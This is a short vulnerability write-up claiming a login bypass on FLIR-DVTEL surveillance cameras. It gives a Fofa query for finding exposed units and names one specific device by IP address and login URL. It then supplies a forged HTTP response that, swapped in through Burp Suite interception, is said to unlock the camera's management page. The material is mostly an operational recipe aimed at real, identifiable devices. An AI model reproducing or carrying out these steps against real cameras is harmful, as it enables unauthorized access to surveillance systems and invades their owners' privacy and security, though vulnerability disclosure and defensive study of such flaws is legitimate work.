The FLIR-DVTEL camera device has a logic flaw vulnerability

Manufacturer's official website：

Thermal Imaging, Night Vision and Infrared Camera Systems | Teledyne FLIR

Search for this equipment asset using the Fofa Cyberspace Mapping Platform

**Use rule syntax:**app="FLIR-DVTEL-视频监控”

Untitled

You can see that there are 114 pieces of device information.

Choose any target from Fofa

url：http://194.90.217.136/doc/page/login.asp

1.Reproduction process：

POC：

HTTP/1.1 200 OK
Date: Thu, 08 Sep 2023 23:34:40 GMT
Server: App-webs/
Connection: close
Content-Length: 185
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<userCheck version="1.0" xmlns="urn:selfextension:psiaext-ver10-xsd">
<statusValue>200</statusValue>
<statusString>OK</statusString>
</userCheck>

Intercept traffic packets with “Burp Suite”

Untitled

Then click the right mouse button, use the "Respon to this request" module of "Do intercept", and click "Forward" to send the packet again

Untitled

After the response packet is successfully intercepted, modify the content inside to the content of the POC

At this time, the operating speed must be fast!

After the modification is complete, click the "Forward" button to send the packet again

Untitled

After sending all the data packets successfully, you will log in successfully and enter the management page of the camera device